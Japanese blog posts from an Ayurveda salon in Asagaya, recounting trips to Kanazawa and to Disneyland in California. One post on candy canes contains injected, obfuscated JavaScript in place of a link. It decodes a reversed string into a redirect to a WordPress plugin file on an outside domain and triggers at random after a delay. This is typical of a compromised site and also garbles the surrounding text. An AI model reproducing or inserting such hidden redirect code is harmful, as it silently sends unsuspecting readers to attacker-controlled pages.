金沢に行ってきました♪ 其の四

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
さて最後は、金沢の楽しかったこといろいろです。
1.レンタサイクル「まちのり」は最高便利
金沢の観光ポイントって、歩けなくもないけど、
ちょびっとずつ離れていて、全部歩いていると
時間的にも体力的にも厳しいんですよね。
で、バスの1日フリーパスとかの利用が定番だったのですが、
なんととても便利なレンタサイクルができてました。
2013-04-043s.jpg
その名も、「まちのり」
※HPはこちら→http://www.machi-nori.jp/port.html
街中の観光ポイントや繁華街など20か所ほどに自転車置き場があり、
クレカがあれば、どこでもすぐレンタル可能。
乗ってから30分以内に移動して、次のポートに返せば
1日何度乗っても200円という、お得価格。

実際に、2日間利用しましたが、とっても便利~~~~
ポート(自転車置き場)に自転車がなかったことが一回、
ポートに不備があったのが一回ありましたが、
別のポートが割と近くにあるし、電話したら、すぐ対応してくれたし
晴れてたら、こんなに便利なものはないな~と思いました
2.念願の「金沢カレー」@ターバンカレー
B級グルメが大好きな私としては、かねてより
「金沢カレー」には注目していました。
でも、東京だと有名なゴーゴーカレーとかは
ちょっと入りづらく、いまだ未体験。。。

で、ここはやはり本場のを食べねば!と、気合を入れて
ランチのサラリーマンが列を作る「ターバンカレー」へ。
ひるむことなく、カウンターで一人食べてきました。
DSC02265ss.jpg
金沢カレーの基本は、このカツとキャベツがのってること。
本当は、ハンバーグとウインナーも乗った「Lセット」
行きたかったのですが、このあとのデザートのことも考えカツのみに…
でも、ウマウマーーーー
金沢カレー独特の黒っぽいルーは辛すぎず、でもコクが深く、
とっても好みの味でした
ああ、やっぱりLセットにすればよかった・・・
そんな「ターバンカレー」は、金沢カレーの老舗
店はカウンターメインですが、全員女性でやってるので
女一人でも意外と入りやすかったです

※HPはこちら→http://www.turbancurry.com/
3.「ル・ミュゼ・ドゥ・アッシュ・カナザワ」
こちらは、石川県立美術館の中にあるパティスリー&カフェ。
※HPはこちら→http://www.kagaya.co.jp/le_musee_de_h/contents/kanazawaConcept.html
石川出身で、世界的に活躍する有名パティシエ・辻口さんが
地元の食材などを生かしたスイーツを提供しているお店で
金沢の友人も、力強く美味しいと言っていたので
甘いもの好き的には、ぜひもののでした

悩みに悩んでいただいたのがこちら。
2013-04-051s.jpg
「セラヴィ」
ピスタチオの風味とベリーの酸味を
ホワイトチョコレートムースで包み込んだエレガントさを感じる逸品。
ピスタチオが大好きなので選んだのですが、
チョコムースってのは普段はあまり積極的に食べないもの。
どうかな?好みに合うかな?と思いつつ食すと、
チョコとベリーとピスタチオのバランスがものすごい絶妙で
ムースうんぬんとか、どうでも良くなる美味しさでしたね~

さすがだな~やっぱりスゴイ人なんだなあと。
実は、モンサンクレールは頂いたことなかったんですけど(笑)
もうこの1個で、期待とリスペクトでいっぱいになっちゃいました。
ぜひ、食べてみようと思います
アーユルヴェーダサロンmanas 《マナス》

金沢に行ってきました♪ 其の三

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
さて、金沢に行って素晴らしかったのは体験だけではなく。
日頃から行いの良いワタクシは(いや、バンドの方だよね:笑)、
なんと[emoji:e-2]ちょうど桜の見頃の時期とピッタリに。
兼六園も金沢城も、ほぼ満開[emoji:e-235][emoji:e-235][emoji:e-235] しかも、観桜期は無料開放[emoji:e-2]に夜桜ライトアップ[emoji:e-2]と
お得で貴重な体験ができちゃうんですよー
8時半ごろから兼六園へ向かうと、
まだ早いせいか人も少なく、すごく気持ちいい[emoji:e-420] DSC02272s.jpg
独り占め状態[emoji:e-51] DSC02276s.jpg
この見晴らしの良さ[emoji:e-2] 兼六園って意外に高いところにあるんだなあと。
金沢城の石川門前も桜が[emoji:e-235] DSC02294s.jpg
こちらは、さらに人が少なくて快適でした[emoji:e-266] そして、夜に出直し夜桜も楽しみましたよ~
DSC02324s.jpg
水面に桜が映って、とても素敵です[emoji:e-349] 私は、兼六園内にある時雨亭で観桜期だけに行われる
夜桜茶会
への参加を狙っていたのですが、
1回25席で4回、先着100名限定とのことで
争奪戦かなあと思い、半ばあきらめつつ行ってみました。。。
すると、思ったより混んでなくて、ちょうど2回目の回に
参加できたんです[emoji:e-2]やった~~~[emoji:e-318]

まず、出てきたのは、この
夜桜茶会限定の
お菓子。
これは、吉はしと言う、一般のお店では売られず、
一部の茶会やお店でしか頂けないという所の上生菓子
[emoji:e-349] 金沢の友人でさえ、テンションが上がる逸品です。
DSC02331s.jpg
お茶も、この時雨亭限定「蓮池の香(れんちのか)」
と言う、オリジナルの抹茶だそうです。
DSC02333.jpg
(薄暗い中で撮ったので、ちょっと曲がってますw)
初心者にも優しい、略式(と言うのかな?)の茶会で
外国人の方なんかも参加されており、
和やかな雰囲気の中、友人に最低限の作法を教えてもらいながら
美味しく頂きました[emoji:e-2] とってもいい体験もできたし、何より桜を満喫[emoji:e-2] これだけでも本当に行った甲斐があるぐらいです[emoji:e-343]
アーユルヴェーダサロンmanas 《マナス》

金沢に行ってきました♪ 其の二

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
さて、金沢での体験は「金澤寿し」だけではありません
二日目は「加賀友禅染め体験」に挑戦です。
(無類の挑戦したがり屋:笑)
向かったのは、「加賀友禅伝統産業会館」
こちらでは、加賀友禅の染め体験はもとより、
着物の着装体験からの写真撮影や街歩きレンタルまであるのです。
私も時間があったら、着装体験したかったのですが、
(高価な加賀友禅を着られるなんてめったにないでしょうし)
今回は時間の都合で「型染め体験」に挑戦することに。

そう、この「型染め体験」、HPによれば
「所要時間約20分」となっているわけですよ、20分。
しかし、そこは何事にも常に真剣勝負のワタクシ…
予想外の展開になりました。

「型染め」の場合、すでに生地に下絵がプリントされており、
見本通りに決まった色を塗っていくだけ。簡単[emoji:e-343]

DSC02315s.jpg
ポイントは、塗り絵のようにベタで塗るのではなく、
端は濃く、中心は薄く、と言うように
グラデーションにするのが大事とのこと。

DSC02316s.jpg
こうやって、色ごとに決まった型紙を乗せ
下絵の位置と合わせながら各色を塗っていきます。

DSC02317s.jpg
型染めでは色は決まっていて、この5色限定。
筆も色ごとに決まっています。
筆の毛は意外に硬くて短く、独特の感じです。
「外側を濃く、内側を薄く・・・」
教えられたことを呪文のように復唱しながら真剣に塗り続ける女一人・・・
平日の昼間とあって、誰もいない作業スペースで黙々と作業を進めて
ようやく完成。
2013-04-052s.jpg
時計を見たら、通常20分程度のはずが
なんと1時間も塗ってました・・・
おかげで、次の予定が狂ったのは言うまでもありません。

あと、グラデを意識しすぎて塗りが薄かったのか、
家帰ってきて洗ったら、かなり薄くなってしまいました・・・

こんな簡単なことも出来ないなんて…と己の未熟さを嘆くと同時に、
伝統工芸の難しさ、技術の素晴らしさを身をもって理解しましたね。
でも、この失敗を糧に、次回はもっといい作品を作ります
(え?)
アーユルヴェーダサロンmanas 《マナス》

金沢に行ってきました♪ 其の一

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
先週後半を、お休みさせていただいたのですが、
実は金沢に行ってきました
金沢は、ライブで良く行ってた時期もあり、
なぜか3年も続けて「百万石まつり」を見たというのに、
(たまたまライブと祭りが重なってただけ)
最近はまったく行ってなかった場所。
今回、久しぶりにライブ遠征に行こうと思ったのは、
今は金沢の実家にいる友人に会う目的もあってのことでした。

以前は、ライブを見るのがメインだったので
ほかには海鮮丼食べたことぐらいしか覚えてなかったんですが
今回は気合が違います
リサーチ魔の本領発揮、往復夜行バスでの一泊二日を
無駄なく過ごすための計画を練りまくって参りました。
特に楽しかったのが、体験モノ
金沢にはたくさんの伝統工芸技術があるので
簡単にその文化に触れることができる体験企画が多くあります。
金箔貼りとか、九谷焼の絵付けとか、和菓子作り体験とか。
私の第一希望は、和菓子作りだったのですが
定員いっぱいになってしまっていて参加できず、
食べ物作りに絞って見つけたのが「押寿し作り体験」です。
DSC02256s.jpg
ます寿司みたいな箱に笹をひいてご飯を詰め、
具材を並べていくだけの簡単体験

並べ終わったらふたをし、強力なゴムをかけて押し寿司に。
そのまま持ち帰って、なじんでからいただきます。
正味30~40分の体験ですが、それをやりながら聞く
お店のお母さんたちのお話がとても面白いし、
金沢の生活についていろいろ知ることができます。

この、押し寿司体験ができる「金澤寿し」
できたきっかけも、とても興味深いものでした。
かつて金沢では、何かお祝い事などがあれば
家庭で「押し寿司」を作っていたのだそうですが
今ではそんな家も少なくなったそう。
そこで、文化を絶やさないようにと、主婦の皆さんが立ち上げたのが
「金澤寿し」なんだそうです。

お店には、お母さんたちが持ちよった
金沢の伝統的な品もたくさん置いてあります。
こちらは、有名な「花嫁のれん」
DSC02258s.jpg
お嫁に行くときに、これをくぐって嫁ぐという儀式のためだけに
使われる贅沢なもの。私は昼ドラで知った記憶が。。。(笑)
これは、教えて下さったお母さんの母親のものだそうですから
およそ80年ぐらい前のものというのに、すごくキレイ
押し寿司体験する2階のお部屋は、お茶休憩でも上がれるそう。
DSC02255s.jpg
群青の壁は、金沢独特のもので、高貴な人だけが使えたのだそうです。
立派な5月人形が飾ってありますね~。
ちなみに、金沢ではお雛様は4月3日まで飾るんですって。
それは、初代加賀藩主である前田利家公の命日が3月3日のため、
それを避けて4月3日にひな祭りを行うと言う風習が残った…と
一説には言われてるとか。なるほど~~ですよね。
さて、押しまくった寿しは、私の夕ご飯となりました。
2013-04-042.jpg
すべて金沢の地元食材。
青いのは、水分を含むと青くなる海藻、加賀野菜のれんこん、
お芋は五郎島金時、ほたるいか、フグの卵巣の糠漬けなどなど。
寿司飯の加減もちょうどよく、美味しく頂きました
お吸い物は、これまた加賀名物 お麩の不室屋さんのもの。
もう、加賀百万石万歳なご飯でした
そんな金沢寿しは、人気観光スポット「ひがし茶屋街」にあります。
DSC02262s.jpg
体験だけではなく、観光途中のお茶休憩も大歓迎とのこと。
お母さんたちの手作りの笹寿しなども売ってました
DSC02260s.jpg
終わると、金沢の方言で書いた修了証ももらえますよ
家族でも友達同士でも楽しいので、おすすめです~
アーユルヴェーダサロンmanas 《マナス》

2009 アメリカ/キャンディケイン

【2009冬 アメリカ旅行 思い出し日記22】
12月21日 キャンディケインの謎
早朝入園したディズニーパークでみんなが並んで買っていたのは
この杖の形のキャンディ。
「キャンディケイン」
k355280302.jpg
詳しいエピソードはこちら

で、ずっと謎に思っていたので、
アメリカに住んでいる知人と合流したあと、
その話をしてみると…
「あ、その手作りのキャンディのお店、
 ニュースでやってた

とのこと。
しかも、彼女の知り合いのアメリカ人たちは
そのニュースを見て、
「このキャンディを買うためだけに
ディズニーランドに行ってもいい」

と言うらしいのです。
ますます謎です。ニュースでやるほどの大変なこと??
飴がすごいのか??飴屋がすごいのか??

で、なぜこの飴がそんなに激熱なのか聞いてみると、
ずっとアメリカにいる彼女も分からないそう。(笑)
でも、とにかくアメリカ人はこの飴が好きらしく、
クリスマスシーズンは、誰彼かまわずこの飴を配るとか。
「いい大人にもくれんのよーこんな飴を」
と知人は言っておりました。あはは。
日本で調べてみると、キリスト教の聖書から
いろんなエピソードを盛り込んだものらしいんだけど、
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andycane.htm” target=”_blank” title=”→「キャンディ・ケインとは」”>→「キャンディ・ケインとは」
それは後付けした理由と言う見方もあるみたいだし。
結局、理由はぼんやりしたまま。
まあ、あえて結論を出すなら、
アメリカ人はキャンディケインが好き

ってことで。
さて、ここからは、今年2010年の話。
昨年のこのキャンディケイン事件は、
私の中にそれなりのインパクトを植え付けたのか
今年、日本でキャンディケインを売っているのを見つけた時は
大変うれしゅうございました。
そしてこれを買い、アメリカ人気取りで
みんなに配ってやるのだ
いらぬ使命感に駆られてしまいました。
101218_1723~02
と言うわけで、着々と配って歩く毎日です。
差し出された人はもらってやってください。
自分でも食べてるけど、普通にミント味でうまいです。
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド6

【2009冬 アメリカ旅行 思い出し日記21】
12月19日 夜景スペシャル
日中は、あれやこれやで大興奮のディズニーランドですが、
夜も本当に美しいのです。
ディズニーパークの入ったところ。
DSC00258.jpg
昼間の様子と見比べてみて~
カリフォルニアパークの入り口。
DSC00349.jpg
昼間はこんな感じ。
イッツ・ア・スモール・ワールド。
DSC00358.jpg
昼間の様子はこちら。
巨大ツリー。
DSC00363.jpg
昼間は昼間でキレイだけどね。
通りからツリー方面を見ると、
ミッキーのリースとツリーが重なるポジション発見
DSC00362.jpg
お堀にキレイに映る、眠れる森の美女のお城。
DSC00264.jpg
これで、ディズニーランドともお別れ
明日は、久しぶりに知人と合流します~~
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド5

【2009冬 アメリカ旅行 思い出し日記20】
12月19日 クリスマスパレード2
クリスマスパレードは、まだまだ続きます。
ホント、長いのよ。
プリンセスゾーン、継続中。
DSC00317.jpg
キタートイストーリーゾーン
DSC00322.jpg
DSC00326.jpg
でっかいツリーも動いてきます。
DSC00327.jpg
二足歩行のトナカイも悪くない。
DSC00329.jpg
もちろん、最後はサンタさん
DSC00330.jpg
ホントに夢の世界ですね、ここは。ふう。
こんな汚れた大人でも、子どもの心に戻ったようでした。(笑)

最後は、夜景スペシャルです~~
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド4

【2009冬 アメリカ旅行 思い出し日記19】
12月19日 クリスマスパレード1
クリスマスパレードは、ホントに可愛くて大興奮。
隣のおばちゃんがグイグイカメラを前に出してきて
人のフレームに入ってくるから、
私も負けずにガシガシ撮ってやりましたふふん
もはや、言葉はいらないので、
撮りまくった写真の中から厳選した写真をどうぞー
先頭集団のテディベア。
DSC00300.jpg
DSC00304.jpg
DSC00306.jpg
ゆきだるまーかわいいー
DSC00308.jpg
ミッキーとミニーは、行ってしまうギリギリで撮ったのでイマイチ。
DSC00309.jpg
ここから、プリンセスゾーン。
DSC00316.jpg
まだまだつづきまーす
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド3

【2009冬 アメリカ旅行 思い出し日記18】
12月19日 ディズニーランド2のつづき
優先入園した人の少ないディズニーパークの中に
とあるショップに大行列がありました。
遠巻きに見てたんですが、再び通りかかると人が減ってたので
近づいてみると、そこはハンドメイドのキャンディ屋さん
店内のレジに並んでる人は、どうやら整理券を持っている模様。
さっきの行列は整理券をもらってたのかな??
それにしても、アメリカ人がそれほどまでに欲しいものってなんなのか、
興味深々でレジをじっと見ていると…彼らが買っていたのは、
良く見るステッキの形のキャンディでした。
k355280302.jpg
「えっ!?なんで????」
いくらハンドメイドだからって、並ぶほどの飴??
スーパーでも売ってるじゃん。。。
と、謎を感じたまま、去りました。
そして後日、その疑問を知り合いにぶつけてみると
面白い答えが返ってきました
謎の真相はこちら。

その後、大好きなジャック仕様になっている
「ホーンテッドマンション」へ。
DSC00279.jpg
ジャック素敵
DSC00280.jpg
そして、ホントによくキャラクターに会う
DSC00285.jpg
順番が周ってこないかもだから、とりあえず他人も撮影。
DSC00335.jpg
昨日、時間切れで逃げられたMr.インクレディブルも
一緒には撮れなかったけど、リベンジ成功
DSC00298.jpg
グーフィーは何度も会った。
でも、グーフィーと一緒にいるモヒカンは
最後まで誰なのか思いだせず。むー

DSC00297.jpg
そして、お昼ごはん
メキシカンのファストフードで、
「ハーフ」サイズのチキンをオーダーしました。
DSC00295.jpg
出てきてビックリまさか一羽分のハーフだったとは…
このあとは、大興奮のクリスマスパレード
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]

2009 アメリカ/ディズニーランド2

【2009冬 アメリカ旅行 思い出し日記17】
12月19日 ディズニーランド2
さて、今日は昨日よりも早起きです。
実は昨日は、
「どうせ外国人は、開園前なんかに行って並んだりしないはず」
と、偏見に満ちた判断でゆっくり行ったら
とんでもない
開園前から並ぶのはもちろん、
パレードだってショーだって、
場所取りの激しさは日本と変わらなかったのです。
で、今日は、2dayチケットの人の、
「開園時間より1時間早く入れる特典」
を有効に使って
7時から行ってやるんですよ、ええ。(なぜか挑戦的)
並んだり待ったりすることで
日本人が外国人に負けられませんからね(え?)
そんなわけで、並んでる人々をしり目に優先入園したワタクシ、
人気のないパークをパチパチ撮りまくりました。
DSC00269.jpg
植え込みが、クリスマス仕様のミッキー。
見て、このでっかいツリー。
ちゃんと大きさが分かるように、
人込みで撮ってるところが我ながら素晴らしい
DSC00270.jpg
夜ヴァージョンもキレイなので、あとで載せますねー
お城とウォルトさんの銅像の配置は日本と同じ。
DSC00274.jpg
イッツ・ア・スモールワールド。
これも昼と夜で全然違うので、次回に夜バージョン見せます。
DSC00277.jpg
そんな一心不乱に撮影してると、なにやら人だかりが。
ふと見ると、ミッキーじゃないですかあああ
DSC00271.jpg
ホントにね、優先入園した甲斐があったというもんですよ。
この娘っ子たちもかなりキュートですが、
このあと、もちろん私も2ショットで撮ってもらいました。
レストランとかじゃなくて、パーク内でミッキーに会えるとは
本当に来てよかったわー
愛してる、アナハイム
つづく
[emoji:e-53]アーユルヴェーダサロンmanas 《マナス》[emoji:e-53]